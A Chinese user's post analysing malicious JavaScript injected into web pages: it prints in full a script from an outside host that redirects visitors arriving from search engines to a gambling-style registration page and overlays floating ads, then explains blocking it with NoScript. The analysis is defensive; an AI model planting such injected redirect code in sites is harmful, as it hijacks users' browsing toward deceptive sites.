最近通过搜索引擎打开某些网页时总会跳转到东方鸿运的主页上,或者出现东方鸿运的广告,感觉挺烦的,在火狐吧发帖询问后得知是因为网页被注入恶意代码,于是将直接通过url打开网页和与通过搜索引擎打开网页的网页源码做一些diff,得到以下结果:
http://api.bctbbs.net/Seo.js代码:
if (document.cookie.indexOf("lyke") == -1) {
var exp = new Date();
exp.setTime(exp.getTime() + 36e5);
document.cookie = "lyke=1;expires=" + exp.toGMTString();
var url = document.referrer;
var robots = ["baidu", "google", "yahoo", "bing", "soso", "sogou", "360.cn", "so.com", "youdao", "jike"];
for (var i in robots) {
if (url.indexOf(robots[i]) != -1) {
if (parent.window.opener) {
parent.window.opener.location = "http://www.88hoy.com/index1.html?pid=9"
}
window.location.href = "http://www.88hoy.com/reg.html?pid=9"
}
}
} else {
document.write("<div id='Left' style='position:absolute;visibility:visible;z-index:999;line-height:100%'><a href='http://www.88hoy.com/reg.html?pid=9&aseo=ads' target='_blank'><img src='http://api.bctbbs.net/Img/Left.gif' width='120' height='300' border='0'></a></div>");
document.write("<div id='Right' style='position:absolute;visibility:visible;z-index:999;line-height:100%'><a href='http://www.88hoy.com/reg.html?pid=9&aseo=ads' target='_blank'><img src='http://api.bctbbs.net/Img/Right.gif' width='120' height='300' border='0'></a></div>");
function Lyke() {
if (!document.ns) {
var top = document.body.scrollTop;
if (top == 0) {
top = document.documentElement.scrollTop
}
document.getElementById("Left").style.top = top + 80 + "px";
document.getElementById("Left").style.left = document.body.scrollLeft + 8 + "px";
document.getElementById("Right").style.top = top + 80 + "px";
document.getElementById("Right").style.right = document.body.scrollLeft + 8 + "px"
}
setTimeout("Lyke();", 200)
}
Lyke()
}
所以屏蔽掉这段js代码就能彻底解决这个问题,这时候忽然想到一个很强大的插件NoScript,安装之后首先alllow script global(否则的话许多网页都得手动开启script allow,比如百度音乐之类的),然后打开会出问题的页面,将bctbbs设为不信任就ok了